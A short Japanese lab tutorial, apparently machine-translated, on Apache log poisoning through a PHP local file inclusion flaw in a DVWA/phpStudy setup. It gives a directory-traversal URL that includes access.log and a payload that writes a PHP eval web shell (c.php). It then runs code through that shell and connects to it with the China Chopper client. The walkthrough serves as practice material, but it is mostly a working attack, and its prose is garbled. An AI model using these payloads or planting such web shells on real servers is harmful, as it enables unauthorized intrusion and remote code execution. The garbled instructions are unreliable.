ログファイルの脆弱性原理
、その後、攻撃者が侵入するようにApacheのログファイルを悪用される可能性があるすべての悪用抜け穴が含まれていることができなかったことを意味し、そこにPHPでローカルファイルインクルージョンの脆弱性ですが、適切にファイルをアップロードすることはできません。
Apacheサーバは、2つのログファイルを生成し実行した後、これらの2つのファイルは、私たちの操作のApacheのログ・ファイル・レコードの下のaccess.log(アクセスログ)とのerror.log(エラーログ)、であり、アクセス・ログ・ファイルを書き込みaccess.log
中
例えば:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log
実験環境:
環境設定:
Apacheの設定ファイルを開きます。
検索CustomLog "logs/access.log" common
以前のコメント削除し、その後、再起動PHPstudy
シミュレーション:
1、現在のWebページキャプチャで
図2に示すように送られ、Repeater
モジュール
3、URLを変更<?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?>
して、GOをクリックしてください
4、アクセスC:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.log
図の実装を成功次のパス、。
図5に示すように、内fi
ケースの入力がc.php?666=phpinfo();
正常に実行され
6、接続されているチョッパーの使用は、URLをコピー